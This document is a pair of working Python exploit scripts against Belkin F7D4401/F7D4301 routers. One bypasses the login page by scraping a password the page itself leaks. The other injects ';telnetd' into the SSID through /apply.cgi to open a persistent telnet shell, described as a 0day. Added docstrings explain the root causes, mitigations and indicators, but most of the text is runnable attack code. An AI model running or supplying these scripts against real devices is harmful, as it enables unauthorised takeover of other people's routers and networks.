Belkin router exploits to bypass login and persistent remote command execution
#!/usr/bin/env python3
# Belkin Router Persistent Remote Command Execution (0day)
# Tested models: F7D4401, F7D4301
# Tested firmware: 1.00.46 (latest firmware)
# You must be logged in to run this exploit (you can use the belkin_login_bypass.py exploit)
# Author BigNerd95
import sys, requests, re
def enable_telnetd(ip: str) -> None:
    """Rewrite the router's SSID so that it ends in an encoded ``;telnetd``.

    The current SSID is read out of the inline JavaScript on
    ``/wireless_id.stm``, shortened if needed so that the whole value stays
    within 32 characters (the 802.11 SSID maximum), suffixed with ``%3B``
    (a URL-encoded ``;``) plus ``telnetd``, and submitted through
    ``/apply.cgi``. The script assumes the firmware hands the SSID to a shell
    without escaping it; that assumption is not verifiable from this file.

    Defensive reading: the weakness this relies on is a configuration field
    reaching a command interpreter without validation. Device-side
    mitigations are to reject or escape shell metacharacters in the SSID,
    to never build shell command lines from configuration strings, and to
    leave no telnet daemon on the image. Observable indicators are an SSID
    containing ``;telnetd`` in the wireless settings page and an unexpected
    listener on TCP/23.

    Args:
        ip: Router address as used in the URL (no scheme, no port).

    Side effects: HTTP GET/POST against the router, progress messages on
    stdout, and the site-module ``exit(1)`` on any failure (``sys.exit``
    would be the portable equivalent; ``exit`` is absent under ``python -S``).
    """
    print("Getting SSID...")
    # The SSID is scraped from a JavaScript assignment embedded in the page,
    # not from a form field.
    wlPage = requests.get("http://"+ip+"/wireless_id.stm")
    # Non-raw pattern literal; Python keeps the unknown escapes as-is, but an
    # r"..." string would be the conventional form.
    srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", wlPage.text)
    if srcSSID:
        SSID = srcSSID.group(1)
        #print(SSID)
    else:
        print("SSID not found!")
        exit(1)
    # A ';' already present means the suffix has been applied before; the
    # script refuses to stack a second one.
    if ';' in SSID:
        print("SSID already injected!")
        exit(1)
    #cmd = "/usr/sbin/telnetd"
    cmd = "telnetd"
    # Keep SSID + ';' + cmd within the 32-character limit by truncating the
    # original SSID, never the appended command.
    if len(SSID)+1+len(cmd) > 32:
        print("SSID too long, it will be truncated...")
        newlen = 32 - len(cmd) - 1
        SSID = SSID[0:newlen]
    # "%3B" is the URL encoding of ';'; the new value is sent in both the
    # wl_ssid and ssid fields of the form below.
    newSSID = SSID+"%3B"+cmd
    print("Injecting SSID...")
    # Hand-built form body (already URL-encoded), passed as a raw string so
    # requests sends it verbatim rather than re-encoding a dict.
    payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid="+newSSID+"&arc_action=Apply+Changes&wchan=1&ssid="+newSSID
    ssidInjection = requests.post("http://"+ip+"/apply.cgi", data=payload)
    # Despite the name, a match here is treated as success: the author takes
    # the "countdown(55);" script in the response as the router's
    # apply-and-reboot page. Whether it appears only on success is an
    # assumption of the script, not something this code checks.
    err = re.search('countdown\(55\);', ssidInjection.text)
    if err:
        print("SSID injected!")
    else:
        print("Cannot inject SSID")
        exit(1)
def main() -> None:
    """Command-line entry point: ``<script> <belkin_router_ip>``.

    With exactly one argument, runs ``enable_telnetd`` against it and tells
    the user to wait before connecting (the router is expected to apply the
    new settings and restart first). Any other argument count prints usage.
    No argument validation is done beyond the count.
    """
    if len(sys.argv) == 2:
        enable_telnetd(sys.argv[1])
        print("Wait a minute, then run: telnet "+sys.argv[1])
    else:
        print("Usage: "+sys.argv[0]+" <belkin_router_ip>")
# Script guard: only run when executed directly, not when imported.
if __name__ == '__main__':
    main()
#!/usr/bin/env python3
# Belkin Login Bypass exploit
# Tested models: F7D4401, F7D4301
# Tested firmware: 1.00.46 (latest firmware)
# Author BigNerd95
import sys, requests, re
def auth_bypass(ip: str) -> None:
    """Log in to the router with a password leaked by its own login page.

    ``/login.stm`` is fetched unauthenticated and searched for a JavaScript
    ``var password ... = "...";`` assignment. If found, the captured value is
    posted to ``/login.cgi`` as the ``pws`` form field. Success is inferred
    from the response *not* mentioning ``loginpserr.stm``.

    Defensive reading: the root cause demonstrated is a secret embedded in a
    page served before authentication. Device-side mitigation is to keep
    credentials out of client-delivered content and verify them only
    server-side; operationally, management interfaces should not be reachable
    from untrusted networks. An unauthenticated GET of ``/login.stm``
    immediately followed by a POST to ``/login.cgi`` from the same client is
    the observable pattern.

    Args:
        ip: Router address as used in the URL (no scheme, no port).

    Side effects: HTTP GET/POST against the router, progress messages on
    stdout, and the site-module ``exit(1)`` on failure (``sys.exit`` would be
    the portable equivalent).
    """
    print("Looking for info disclosure...")
    loginPage = requests.get("http://"+ip+"/login.stm")
    # Greedy ".*" groups: the pattern takes whatever the page puts in the
    # quoted value, so a page with several such assignments would match the
    # first one only.
    srcPwd = re.search('var password.*=.*"(.*)";', loginPage.text)
    if srcPwd:
        print("Info disclosure found!")
        loginPwd = srcPwd.group(1)
    else:
        print("No info disclosure found!")
        exit(1)
    print("Logging in...")
    # Hand-built form body passed as a raw string; the password is inserted
    # without URL-encoding, so characters such as '&' or '%' in it would
    # corrupt the request.
    payload = "totalMSec=0000000000.000&pws="+loginPwd+"&arc_action=login&pws_temp=&action=Submit"
    login = requests.post("http://"+ip+"/login.cgi", data=payload)
    # The router is assumed to redirect to loginpserr.stm on a bad password;
    # absence of that string is taken as success. Nothing else in the
    # response is checked.
    err = re.search('loginpserr.stm', login.text)
    if not err:
        print("Logged in!")
    else:
        print("Login failed")
        exit(1)
def main() -> None:
    """Command-line entry point: ``<script> <belkin_router_ip>``.

    With exactly one argument, runs ``auth_bypass`` against it and then
    points the user at the router's web interface (the session is expected
    to be established in the router, not in this process — no cookie is kept
    here). Any other argument count prints usage.
    """
    if len(sys.argv) == 2:
        auth_bypass(sys.argv[1])
        print("Go with your browser to http://"+sys.argv[1])
    else:
        print("Usage: "+sys.argv[0]+" <belkin_router_ip>")
# Script guard: only run when executed directly, not when imported.
if __name__ == '__main__':
    main()